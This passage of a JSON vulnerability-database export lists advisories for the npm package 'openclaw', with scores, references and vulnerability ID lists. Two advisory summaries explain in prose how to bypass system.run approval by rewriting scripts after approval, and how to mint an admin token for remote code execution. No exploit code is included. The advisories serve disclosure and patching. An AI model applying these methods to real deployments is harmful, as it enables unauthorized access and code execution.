erability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["CVE-2026-34425","GHSA-fvx6-pj3r-5q4q"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-y7sd-j9xn-qffs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91609?format=json","vulnerability_id":"VCID-y8jc-h9ft-auge","summary":"Duplicate Advisory: OpenClaw: Unrecognized script runners could bypass `system.run` approval integrity\n### Duplicate Advisory\nThis advisory 
has been withdrawn because it is a duplicate of GHSA-qc36-x95h-7j53. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.11 contains an approval integrity vulnerability where system.run approvals fail to bind mutable file operands for certain script runners like tsx and jiti. Attackers can obtain approval for benign script commands, rewrite referenced scripts on disk, and execute modified code under the approved run context.","references":[{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qc36-x95h-7j53","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qc36-x95h-7j53"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32978","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32978"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-approval-bypass-via-unrecognized-script-runners","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/
PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-approval-bypass-via-unrecognized-script-runners"},{"reference_url":"https://github.com/advisories/GHSA-rwwx-25m7-ww73","reference_id":"GHSA-rwwx-25m7-ww73","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rwwx-25m7-ww73"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCI
D-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCI
D-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCI
D-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCI
D-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCI
D-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pk
g:npm/openclaw@2026.3.12"}],"aliases":["GHSA-rwwx-25m7-ww73"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-y8jc-h9ft-auge"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91133?format=json","vulnerability_id":"VCID-ycse-95bv-7ua9","summary":"OpenClaw: Pairing-scoped device tokens could mint `operator.admin` and reach node RCE\n## Summary\nIn affected versions of `openclaw`, a caller holding only `operator.pairing` could use `device.token.rotate` to mint a new token with broader scopes for an already paired device. If the target device was approved for `operator.admin`, the attacker could obtain an administrative token without already holding administrative scope.\n\n## Impact\nThis is a critical authorization flaw. On deployments with connected node hosts or companion apps that expose `system.run`, the escalated token could then modify node execution approvals and reach real remote code execution on the node. Even without nodes, the flaw still granted unauthorized gateway-admin access.\n\n## Affected Packages and Versions\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.3.8`\n- Fixed in: `2026.3.11`\n\n## Technical Details\n`device.token.rotate` accepted caller-supplied target scopes and validated them against the target device's approved scopes, but it did not constrain the newly minted scopes to the caller's own current scope set. That allowed a pairing-scoped caller to mint a broader token for an already paired administrative device.\n\n## Fix\nOpenClaw now enforces caller-scope subsetting in `device.token.rotate`, preventing callers from minting device tokens broader than the scopes they already hold. 
The fix shipped in `openclaw@2026.3.11`.\n\n## Workarounds\nUpgrade to `2026.3.11` or later.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4jpw-hj22-2xmc","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4jpw-hj22-2xmc"},{"reference_url":"https://github.com/advisories/GHSA-4jpw-hj22-2xmc","reference_id":"GHSA-4jpw-hj22-2xmc","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4jpw-hj22-2xmc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-
1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-
73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2